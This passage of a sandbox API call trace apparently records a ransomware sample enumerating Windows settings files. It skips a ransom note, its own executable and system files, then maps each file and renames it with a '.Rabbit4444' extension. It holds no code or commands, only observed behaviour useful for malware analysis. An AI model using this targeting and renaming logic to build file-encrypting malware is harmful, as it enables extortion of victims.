dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", cAlternateFileName="CL02CE~1.SET")) returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2=".") returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="..") returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="windows") returned -1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="boot") returned 1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.240] lstrcmpiW (lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.240] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms" | out: lpString1="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms") returned="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms" [0059.240] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.241] lstrlenW (lpString="Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms") returned 64 [0059.241] lstrlenW (lpString="Rabbit4444") returned 10 [0059.241] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.241] lstrlenW (lpString=".dll") returned 4 [0059.241] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.241] lstrlenW (lpString=".lnk") returned 4 [0059.241] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.241] lstrlenW (lpString=".ini") returned 4 [0059.241] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.241] lstrlenW (lpString=".sys") returned 4 [0059.241] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9b802ef5-59b7-4974-9022-06dc2a9b1677}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.241] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.241] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15055190469) returned 1 [0059.241] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1006) returned 1 [0059.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.241] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.242] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.243] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.244] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.244] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.244] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.244] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15055442984) returned 1 [0059.244] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.244] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.244] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.244] CloseHandle (hObject=0x298) returned 1 [0059.244] CloseHandle (hObject=0x278) returned 1 [0059.244] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms.Rabbit4444") returned 192 [0059.244] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9b802ef5-59b7-4974-9022-06dc2a9b1677}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9b802ef5-59b7-4974-9022-06dc2a9b1677}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.245] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54463fb7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54463fb7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", cAlternateFileName="CLE37B~1.SET")) returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2=".") returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="..") returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="windows") returned -1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="boot") returned 1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.245] lstrcmpiW (lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.245] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms" | out: lpString1="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms") returned="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms" [0059.245] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.245] lstrlenW (lpString="Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms") returned 64 [0059.245] lstrlenW (lpString="Rabbit4444") returned 10 [0059.245] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.246] lstrlenW (lpString=".dll") returned 4 [0059.246] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.246] lstrlenW (lpString=".lnk") returned 4 [0059.246] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.246] lstrlenW (lpString=".ini") returned 4 [0059.246] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.246] lstrlenW (lpString=".sys") returned 4 [0059.246] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ba8a9a5-f1c1-4f09-ae9a-efeaa5961be3}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.246] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.246] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15055684178) returned 1 [0059.246] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1020) returned 1 [0059.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.246] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.246] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.247] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.248] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.249] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15055931650) returned 1 [0059.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.249] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.249] CloseHandle (hObject=0x298) returned 1 [0059.249] CloseHandle (hObject=0x278) returned 1 [0059.249] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms.Rabbit4444") returned 192 [0059.249] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ba8a9a5-f1c1-4f09-ae9a-efeaa5961be3}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ba8a9a5-f1c1-4f09-ae9a-efeaa5961be3}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.250] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x544fc922, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x544fc922, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", cAlternateFileName="CL7736~1.SET")) returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2=".") returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="..") returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="windows") returned -1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="boot") returned 1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.250] lstrcmpiW (lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.250] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms" | out: lpString1="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms") returned="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms" [0059.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.251] lstrlenW (lpString="Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms") returned 64 [0059.251] lstrlenW (lpString="Rabbit4444") returned 10 [0059.251] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.251] lstrlenW (lpString=".dll") returned 4 [0059.251] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.251] lstrlenW (lpString=".lnk") returned 4 [0059.251] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.251] lstrlenW (lpString=".ini") returned 4 [0059.251] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.251] lstrlenW (lpString=".sys") returned 4 [0059.251] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c39057f-5ce5-4bab-be61-2957a12eec52}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.251] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.251] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15056198667) returned 1 [0059.251] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=933) returned 1 [0059.252] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.252] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0059.252] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.253] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.254] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15056475171) returned 1 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0059.254] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.254] CloseHandle (hObject=0x298) returned 1 [0059.254] CloseHandle (hObject=0x278) returned 1 [0059.254] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms.Rabbit4444") returned 192 [0059.254] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c39057f-5ce5-4bab-be61-2957a12eec52}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c39057f-5ce5-4bab-be61-2957a12eec52}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.255] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5459528e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5459528e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x363, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", cAlternateFileName="CL4CFB~1.SET")) returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2=".") returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="..") returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="windows") returned -1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="boot") returned 1 [0059.255] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.256] lstrcmpiW (lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.256] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms" | out: lpString1="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms") returned="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms" [0059.256] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.256] lstrlenW (lpString="Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms") returned 64 [0059.256] lstrlenW (lpString="Rabbit4444") returned 10 [0059.256] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.256] lstrlenW (lpString=".dll") returned 4 [0059.256] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.256] lstrlenW (lpString=".lnk") returned 4 [0059.256] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.256] lstrlenW (lpString=".ini") returned 4 [0059.256] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.256] lstrlenW (lpString=".sys") returned 4 [0059.256] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms" (normalized: 